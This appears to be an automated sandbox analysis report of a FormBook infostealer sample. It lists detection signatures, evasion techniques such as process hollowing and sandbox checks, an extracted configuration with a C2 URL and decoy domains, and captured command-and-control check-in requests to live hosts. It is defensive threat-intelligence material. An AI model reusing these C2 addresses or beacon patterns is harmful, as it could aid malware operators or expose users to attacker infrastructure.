Windows Analysis Report ejecutable2.exe

Overview

General Information

Sample Name: ejecutable2.exe
Analysis ID: 491547
MD5: 2d359d2c999ccb15bc71229bb0275bb6
SHA1: 5b5a384e8147fd996ca7c1c08f041f7b1fe7927a
SHA256: 5345f3e44aadb2d07feb0520bce71dd59be35a53410fcfda5c5c1bec06b176bf

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

Found malware configuration
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.wwiilive.com/u4an/"], "decoy": ["charlottesbestroofcompany.com", "gxzcgl.com", "easyprints.xyz", "hitmanautomation.com", "play-to-escape.com", "beansmagic.com", "lianxiwan.xyz", "nuhive.net", "whystake.com", "n6h65.online", "emergencyprep4cast.com", "peolinks.com", "8ls-world.com", "tezportal.net", "trych.net", "bathrobeconnection.com", "quinnwebster.top", "sagarmakhija.online", "ladiesgossiping.com", "400doultonct.com", "anitaeichler.net", "zaibuxi.info", "cateringfrenchcroissant.com", "iblispk.art", "area-arquitectos.com", "iptechcm.com", "earthnodeone.com", "yhomggsmtdynchb.store", "movingcompanybaltimoremd.com", "na6jzt.com", "solarpanelsforhome.net", "krnlfree.com", "institutosamar.com", "only-dieta.store", "shieldhero.online", "booklibrarypdfapp.icu", "solidhelp.net", "bearmarket.party", "billysboots.com", "pyuaetr.com", "pizza-mio.com", "merchantcentergroup.com", "branchwallet.com", "multicoininvestment.com", "gzruohong.com", "doomfishingtackle.com", "eryamanescortbayan.xyz", "tunetel.com", "rhccateringevents.com", "monamodda.com", "horsmon-merchandising.com", "sharkhostlive.com", "petersonmovingco.com", "forinfodunia.com", "theseattlenotary.com", "nyc-lavage.com", "tes5ci.com", "dunedinhyperlocal.com", "myntlaccount.online", "vehiclegraphicstoronto.com", "alexarts-tortenmanufaktur.info", "empresaimperfeitors.com", "oinfoproduto.com", "mdjrhyp.com"]}
Multi AV Scanner detection for submitted file
Source: ejecutable2.exe Virustotal: Detection: 27%
Yara detected FormBook
Source: Yara match File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.ejecutable2.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: ejecutable2.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: ejecutable2.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdb source: ejecutable2.exe, 00000004.00000002.487685735.00000000009D0000.00000040.00000001.sdmp, wscript.exe
Source: Binary string: wscript.pdb source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp
Source: Binary string: wscript.pdbN source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 35.168.81.157:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 34.102.136.180:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.branchwallet.com
Source: C:\Windows\explorer.exe Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe Network Connect: 5.101.152.161 80
Source: C:\Windows\explorer.exe Network Connect: 35.168.81.157 80
Source: C:\Windows\explorer.exe Network Connect: 3.223.115.185 80
Source: C:\Windows\explorer.exe Domain query: www.tunetel.com
Source: C:\Windows\explorer.exe Domain query: www.play-to-escape.com
Source: C:\Windows\explorer.exe Domain query: www.yhomggsmtdynchb.store
Source: C:\Windows\explorer.exe Network Connect: 217.160.0.222 80
Source: C:\Windows\explorer.exe Domain query: www.iptechcm.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.pizza-mio.com
Source: C:\Windows\explorer.exe Network Connect: 195.77.116.8 80
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.77 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.wwiilive.com/u4an/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View ASN Name: BEGET-ASRU BEGET-ASRU
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=FQD7DOPg41An23BytYAyzDzwyZJ0tQikl+psJg3VSFai3GWkns53TVvYc7bwkTS4QXibfw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.tunetel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=bje5eY1RGEWNtm8ygCOrlm2ug1qlHU7639KaGd4GF1Wfo4/TJzpT6n4yoGbd2Lg1L0Vz5w==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.branchwallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=Xsze89gQxfgRrb0U/pbtTMTkEZR7VVn3wnJWYt+8gVFiExqV2mQQrtUEc4jTVg5kW61b5Q==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.iptechcm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=Ea+fIX+qvB9rXsVioouSESAKF/QLNUis3qIxLYsU8whjNSMesV9wMQUCyx2IDzdIrw8QIA==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.pizza-mio.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.wwiilive.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=wU8NyZPkNGRQQpssl8Iv49O+whrQvSeXFC/S+Kx28E86ZZkWNSugarjcLE+3raO3NGyltw==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.play-to-escape.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u4an/?cRrtMz2=vtjrYftuZe8iaBtQ/TWxrabmNpKe1jOOTYTB1/nX+Um4K24Q/B9FUBqnYP2A+q8J0+YELg==&an=lnlpiVNpa2ntv HTTP/1.1Host: www.yhomggsmtdynchb.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 3.223.115.185 3.223.115.185
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 Sep 2021 15:39:12 GMTContent-Type: text/htmlContent-Length: 808Connection: closeVary: Accept-EncodingLast-Modified: Fri, 09 Oct 2020 08:38:37 GMTETag: "328-5b138dffc24c6"Accept-Ranges: bytes
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: ejecutable2.exe, 00000000.00000002.424368944.00000000025F1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.472044018.0000000003E50000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000005.00000000.471115226.0000000002CC7000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000005.00000000.431378110.0000000004650000.00000002.00020000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000005.00000000.473039091.0000000004513000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000005.00000000.439477133.00000000044E7000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerT
Source: explorer.exe, 00000005.00000000.472858003.000000000447A000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: ejecutable2.exe, ejecutable2.exe, 00000004.00000000.422605822.0000000001122000.00000020.00020000.sdmp String found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
Source: explorer.exe, 00000005.00000000.470780765.0000000002AE0000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000005.00000000.435228530.0000000000255000.00000004.00000020.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknown DNS traffic detected: queries for: www.tunetel.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 4.2.ejecutable2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: ejecutable2.exe, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: CmsVPZkxbOtm.exe.0.dr, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 0.0.ejecutable2.exe.1120000.0.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 0.2.ejecutable2.exe.1120000.2.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Source: 4.2.ejecutable2.exe.1120000.5.unpack, Darwin.WindowsForm/SearchResults.cs Long String: Length: 34816
Uses 32bit PE files
Source: ejecutable2.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.680646002.0000000000070000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.680796769.0000000000370000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.454793663.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.485826992.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.680759231.0000000000340000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.444851968.0000000009A29000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.485892584.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.425119255.00000000035F1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.485646603.00000000000C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_003300F0 0_2_003300F0
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_003369C9 0_2_003369C9
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00336D30 0_2_00336D30
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033E418 0_2_0033E418
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00339409 0_2_00339409
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033E685 0_2_0033E685
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_0033CC98 0_2_0033CC98
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00336D21 0_2_00336D21
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_00338FD0 0_2_00338FD0
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C6B67 0_2_048C6B67
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C51CC 0_2_048C51CC
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 0_2_048C5F99 0_2_048C5F99
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00401030 4_2_00401030
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041BA85 4_2_0041BA85
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C296 4_2_0041C296
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041BBE0 4_2_0041BBE0
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00408C6B 4_2_00408C6B
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00408C70 4_2_00408C70
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C40C 4_2_0041C40C
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C4F7 4_2_0041C4F7
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_0041C55C 4_2_0041C55C
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00402D90 4_2_00402D90
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02441238 6_2_02441238
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239E2E9 6_2_0239E2E9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A2305 6_2_023A2305
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023EA37B 6_2_023EA37B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A7353 6_2_023A7353
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023C63DB 6_2_023C63DB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239F3CF 6_2_0239F3CF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023CD005 6_2_023CD005
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B905A 6_2_023B905A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A3040 6_2_023A3040
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239E0C6 6_2_0239E0C6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02442622 6_2_02442622
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A4680 6_2_023A4680
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023AE6C1 6_2_023AE6C1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023AC7BC 6_2_023AC7BC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0242579A 6_2_0242579A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D57C3 6_2_023D57C3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023DD47D 6_2_023DD47D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B1489 6_2_023B1489
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D5485 6_2_023D5485
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A351F 6_2_023A351F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023BC5F0 6_2_023BC5F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02453A83 6_2_02453A83
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023C7B00 6_2_023C7B00
